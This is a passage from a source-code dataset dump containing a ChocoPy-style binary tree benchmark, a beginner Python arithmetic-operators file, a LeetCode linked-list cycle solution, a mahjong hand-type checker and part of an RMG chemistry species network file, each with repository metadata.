self.right.insert(x) return False def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if x < self.value: if self.left is None: self.left = makeNode5(x, x, x, x, x) return True else: return self.left.insert(x) elif x > self.value: if self.right is None: self.right = makeNode5(x, x, x, x, x) return True else: return self.right.insert(x) return False def contains(self:"TreeNode5", x:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains2(self:"TreeNode5", x:int, x2:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if x < self.value: if self.left is None: return False else: return self.left.contains(x) elif x > self.value: if self.right is None: return False else: return self.right.contains(x) else: return True class Tree(object): root:TreeNode = None size:int = 0 def insert(self:"Tree", x:int) -> object: if self.root is None: self.root = makeNode(x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree", x:int) -> bool: if self.root is None: return False else: return 
self.root.contains(x) class Tree2(object): root:TreeNode2 = None root2:TreeNode2 = None size:int = 0 size2:int = 0 def insert(self:"Tree2", x:int) -> object: if self.root is None: self.root = makeNode2(x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree2", x:int, x2:int) -> object: if self.root is None: self.root = makeNode2(x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree2", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree2", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree3(object): root:TreeNode3 = None root2:TreeNode3 = None root3:TreeNode3 = None size:int = 0 size2:int = 0 size3:int = 0 def insert(self:"Tree3", x:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree3", x:int, x2:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode3(x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree3", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree3", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree4(object): root:TreeNode4 = None root2:TreeNode4 = None root3:TreeNode4 = None root4:TreeNode4 = None size:int = 0 size2:int = 0 size3:int = 0 size4:int = 0 def insert(self:"Tree4", x:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if 
self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree4", x:int, x2:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object: if self.root is None: self.root = makeNode4(x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree4", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree4", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool: if self.root is None: return False else: return self.root.contains(x) class Tree5(object): root:TreeNode5 = None root2:TreeNode5 = None root3:TreeNode5 = None root4:TreeNode5 = None root5:TreeNode5 = None size:int = 0 size2:int = 0 size3:int = 0 size4:int = 0 size5:int = 0 def insert(self:"Tree5", x:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert2(self:"Tree5", x:int, x2:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 
else: if self.root.insert(x): self.size = self.size + 1 def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object: if self.root is None: self.root = makeNode5(x, x, x, x, x) self.size = 1 else: if self.root.insert(x): self.size = self.size + 1 def contains(self:"Tree5", x:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains2(self:"Tree5", x:int, x2:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool: if self.root is None: return False else: return self.root.contains(x) def makeNode(x: int) -> TreeNode: b:TreeNode = None b = TreeNode() b.value = x return b def makeNode2(x: int, x2: int) -> TreeNode2: b:TreeNode2 = None b2:TreeNode2 = None b = TreeNode2() b.value = x return b def makeNode3(x: int, x2: int, x3: int) -> TreeNode3: b:TreeNode3 = None b2:TreeNode3 = None b3:TreeNode3 = None b = TreeNode3() b.value = x return b def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4: b:TreeNode4 = None b2:TreeNode4 = None b3:TreeNode4 = None b4:TreeNode4 = None b = TreeNode4() b.value = x return b def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5: b:TreeNode5 = None b2:TreeNode5 = None b3:TreeNode5 = None b4:TreeNode5 = None b5:TreeNode5 = None b = TreeNode5() b.value = x return b # Input parameters n:int = 100 n2:int = 100 n3:int = 100 n4:int = 100 n5:int = 100 c:int = 4 c2:int = 4 c3:int = 4 c4:int = 4 c5:int = 4 # Data t:Tree = None t2:Tree = None t3:Tree = None t4:Tree = None t5:Tree = None i:int = 0 i2:int = 0 i3:int = 0 i4:int = 0 i5:int = 0 k:int = 37813 k2:int = 37813 k3:int = 37813 k4:int = 37813 k5:int = 
37813 # Crunch t = Tree() while i < n: t.insert(k) k = (k * 37813) % 37831 if i % c != 0: t.insert(i) i = i + 1 print(t.size) for i in [4, 8, 15, 16, 23, 42]: if t.contains(i): print(i)
734222744177ba9b4b567229c0c42a7e3e563b04
71b11008ab0455dd9fd2c47107f8a27e08febb27
/04、 python编程/day01/3-code/算数运算符.py
449a9baa4ca2b1ae2202b8fdd1968229b4f48c70
[]
no_license
zmh19941223/heimatest2021
49ce328f8ce763df0dd67ed1d26eb553fd9e7da4
3d2e9e3551a199bda9945df2b957a9bc70d78f64
refs/heads/main
2023-08-25T17:03:31.519976
2021-10-18T05:07:03
2021-10-18T05:07:03
418,348,201
0
0
null
null
null
null
UTF-8
Python
false
false
112
py
print(3 + 2) print(3 - 2) print(3 * 2) print(3 / 2) print(3 // 2) print(3 % 2) print(3 ** 2) print("hello" * 3)
c6adb1d9469a5adfe8a767e63e40fbd9ab028c03
8df1237388352d29c894403feaf91e800edef6bf
/Algorithms/141.linked-list-cycle/141.linked-list-cycle.py
255c09e7e984294aef20caa856189c3b49b66f31
[ "MIT" ]
permissive
GaLaPyPy/leetcode-solutions
8cfa5d220516683c6e18ff35c74d84779975d725
40920d11c584504e805d103cdc6ef3f3774172b3
refs/heads/master
2023-06-19T22:28:58.956306
2021-07-19T00:20:56
2021-07-19T00:20:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
272
py
class Solution: def hasCycle(self, head: ListNode) -> bool: fast = slow = head while slow and fast and fast.next: slow = slow.next fast = fast.next if slow is fast: return True return False
5b47d39363b966b6fd8208f0f5a184dedf934ca4
c9642233f1de71f1a61ae28c695c2d9228825156
/echecs_espoir/service/mahjong/models/hutype/two/siguiyi.py
63d95ac314dad7a3b187dc3c09ab0befe8eacee5
[ "AFL-3.0" ]
permissive
obespoir/echecs
d8314cffa85c8dce316d40e3e713615e9b237648
e4bb8be1d360b6c568725aee4dfe4c037a855a49
refs/heads/master
2022-12-11T04:04:40.021535
2020-03-29T06:58:25
2020-03-29T06:58:25
249,185,889
16
9
null
null
null
null
UTF-8
Python
false
false
2,763
py
# coding=utf-8 import time from service.mahjong.models.hutype.basetype import BaseType from service.mahjong.constants.carddefine import CardType, CARD_SIZE from service.mahjong.models.card.hand_card import HandCard from service.mahjong.models.card.card import Card from service.mahjong.models.utils.cardanalyse import CardAnalyse class SiGuiYi(BaseType): """ 4) 四归一:胡牌时,牌里有4张相同的牌归于一家的顺、刻子、对、将牌中(不包括杠牌) 。 """ def __init__(self): super(SiGuiYi, self).__init__() def is_this_type(self, hand_card, card_analyse): used_card_type = [CardType.WAN] # 此游戏中使用的花色 union_card = hand_card.union_card_info gang_lst = [] gang_lst.extend(hand_card.dian_gang_card_vals) gang_lst.extend(hand_card.bu_gang_card_vals) gang_lst.extend(hand_card.an_gang_card_vals) ret = [] # 手里有4张的牌集 for i, count in enumerate(union_card[CardType.WAN]): if i == 0 and count < 4: return False if count == 4 and Card.cal_card_val(CardType.WAN, i) not in gang_lst: ret.append(Card.cal_card_val(CardType.WAN, i)) if not ret: return False gang_lst = self.get_gang_lst(hand_card) for i in ret: if i in gang_lst: return False return True def get_gang_lst(self, hand_card): ret = [] for i in hand_card.dian_gang_card_vals: # 点杠的牌 ret.append(i[0]) for i in hand_card.bu_gang_card_vals: # 补杠的牌 ret.append(i[0]) for i in hand_card.an_gang_card_vals: # 暗杠的牌 ret.append(i[0]) return ret if __name__ == "__main__": pass card_analyse = CardAnalyse() hand_card = HandCard(0) # hand_card.hand_card_info = { # 1: [9, 1, 1, 1, 1, 1, 1, 1, 1, 1], # 万 # 2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条 # 3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼 # 4: [2, 2, 0, 0, 0], # 风 # 5: [3, 3, 0, 0], # 箭 # } hand_card.hand_card_info = { 1: [9, 1, 1, 4, 1, 1, 1, 1, 1, 1], # 万 2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条 3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼 4: [2, 2, 0, 0, 0], # 风 5: [0, 0, 0, 0], # 箭 } hand_card.handle_hand_card_for_settle_show() hand_card.union_hand_card() print("hand_card =", hand_card.hand_card_vals) test_type = SiGuiYi() start_time = time.time() 
print(test_type.is_this_type(hand_card, card_analyse)) print("time = ", time.time() - start_time)
21c351a8fe2fc37d56c8ee1bc4ffb02f12c1c5cf
04803c70bb97012b7d500a177ac0240fb2ddbe38
/4chpd/pdep/network556_1.py
2b8da0c07c0a5631e9d783dabeb7fa796d2e24f7
[]
no_license
shenghuiqin/chpd
735e0415f6688d88579fc935459c1b0f53596d1d
396ba54629036e3f2be0b3fabe09b78c90d56939
refs/heads/master
2023-03-01T23:29:02.118150
2019-10-05T04:02:23
2019-10-05T04:02:23
192,084,217
0
0
null
2019-06-18T18:33:13
2019-06-15T13:52:28
HTML
UTF-8
Python
false
false
93,703
py
species( label = 'C=C[CH]C(C)O[CH]C(2302)', structure = SMILES('C=C[CH]C(C)O[CH]C'), E0 = (69.8904,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3000,3050,390,425,1340,1360,335,370,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.672656,0.0957605,-8.24922e-05,3.6976e-08,-6.69666e-12,8579.82,31.2676], Tmin=(100,'K'), Tmax=(1315.44,'K')), NASAPolynomial(coeffs=[18.8206,0.0364849,-1.48996e-05,2.71977e-09,-1.86197e-13,3451.42,-68.1203], Tmin=(1315.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(69.8904,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + longDistanceInteraction_noncyclic(OsCs-ST) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CCsJOCs)"""), ) species( label = 'C=CC=CC(381)', structure = 
SMILES('C=CC=CC'), E0 = (57.8956,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,2995,3010,3025,975,987.5,1000,1300,1337.5,1375,400,450,500,1630,1655,1680,180],'cm^-1')), HinderedRotor(inertia=(0.831076,'amu*angstrom^2'), symmetry=1, barrier=(19.1081,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.833175,'amu*angstrom^2'), symmetry=1, barrier=(19.1563,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (68.117,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3140.68,'J/mol'), sigma=(5.4037,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=490.57 K, Pc=45.16 bar (from Joback method)"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.00727,0.0328459,1.55855e-05,-4.25745e-08,1.84259e-11,7044.82,16.9534], Tmin=(100,'K'), Tmax=(972.32,'K')), NASAPolynomial(coeffs=[11.2869,0.0212416,-7.50361e-06,1.3618e-09,-9.72233e-14,3984.25,-34.0139], Tmin=(972.32,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(57.8956,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(299.321,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH)"""), ) species( label = 'CH3CHO(52)', structure = SMILES('CC=O'), E0 = (-178.765,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,180,1305.64,1305.66,1305.67,3976.84],'cm^-1')), HinderedRotor(inertia=(0.136163,'amu*angstrom^2'), symmetry=1, barrier=(3.13064,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (44.0526,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3625.12,'J/mol'), 
sigma=(3.97,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.72946,-0.00319329,4.75349e-05,-5.74586e-08,2.19311e-11,-21572.9,4.10302], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[5.40411,0.0117231,-4.22631e-06,6.83725e-10,-4.09849e-14,-22593.1,-3.48079], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-178.765,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""CH3CHO""", comment="""Thermo library: FFCM1(-)"""), ) species( label = '[CH2]C1[CH]C(C)OC1C(3810)', structure = SMILES('[CH2]C1[CH]C(C)OC1C'), E0 = (100.754,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.05457,0.0429246,6.83606e-05,-1.25698e-07,5.48853e-11,12244.5,26.7473], Tmin=(100,'K'), Tmax=(900.209,'K')), NASAPolynomial(coeffs=[17.0446,0.0297095,-5.98931e-06,7.31272e-10,-4.5941e-14,7022.18,-61.7305], Tmin=(900.209,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(100.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Tetrahydrofuran) + radical(CCJCO) + radical(Isobutyl)"""), ) species( label = 'H(19)', structure = SMILES('[H]'), E0 = (211.792,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (1.00794,'amu'), collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, 
comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""), ) species( label = 'C=CC=C(C)O[CH]C(3811)', structure = SMILES('C=CC=C(C)O[CH]C'), E0 = (18.4008,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,350,440,435,1725,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.760161,0.0904933,-6.20578e-05,4.69667e-09,7.81107e-12,2397.25,29.882], Tmin=(100,'K'), Tmax=(969.439,'K')), NASAPolynomial(coeffs=[23.2212,0.0234865,-7.80361e-06,1.37545e-09,-9.74342e-14,-3753.46,-92.8118], Tmin=(969.439,'K'), Tmax=(5000,'K'))], 
Tmin=(100,'K'), Tmax=(5000,'K'), E0=(18.4008,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + radical(CCsJOC(O))"""), ) species( label = 'C=C[CH]C(C)OC=C(3812)', structure = SMILES('C=C[CH]C(C)OC=C'), E0 = (-24.7917,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,2950,3000,3050,3100,1330,1430,900,1050,1000,1050,1600,1700,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.534319,0.0787576,-1.59677e-05,-4.7868e-08,2.72276e-11,-2799.48,29.02], Tmin=(100,'K'), Tmax=(957.022,'K')), NASAPolynomial(coeffs=[25.1838,0.0220849,-6.79384e-06,1.22813e-09,-9.22084e-14,-10049.3,-106.084], Tmin=(957.022,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-24.7917,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-CsCsOsH) + 
group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(C=CCJCO)"""), ) species( label = 'C=C=CC(C)O[CH]C(3813)', structure = SMILES('C=C=CC(C)O[CH]C'), E0 = (114.904,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([540,610,2055,3025,407.5,1350,352.5,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (111.162,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.310802,0.088366,-7.57669e-05,3.37793e-08,-6.08475e-12,13980.2,32.2937], Tmin=(100,'K'), Tmax=(1321.76,'K')), NASAPolynomial(coeffs=[17.7324,0.033762,-1.37991e-05,2.52388e-09,-1.73009e-13,9210.52,-59.7877], Tmin=(1321.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(114.904,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CCsJOCs)"""), ) species( label = '[CH2]C=C[CH]C(377)', structure = SMILES('[CH2]C=C[CH]C'), E0 = 
(240.064,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,3025,407.5,1350,352.5,180],'cm^-1')), HinderedRotor(inertia=(0.0180055,'amu*angstrom^2'), symmetry=1, barrier=(19.7234,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(1.34503,'amu*angstrom^2'), symmetry=1, barrier=(119.627,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.0180001,'amu*angstrom^2'), symmetry=1, barrier=(19.7225,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (68.117,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.18178,0.0283568,2.70949e-05,-5.14684e-08,2.05693e-11,28948.9,17.5848], Tmin=(100,'K'), Tmax=(990.212,'K')), NASAPolynomial(coeffs=[10.2369,0.0240425,-9.12514e-06,1.70243e-09,-1.22294e-13,25969.9,-28.1844], Tmin=(990.212,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(240.064,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Allyl_S)"""), ) species( label = 'CH3(34)', structure = SMILES('[CH3]'), E0 = (136.188,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')), ], spinMultiplicity = 2, opticalIsomers = 1, molecularWeight = (15.0345,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = 
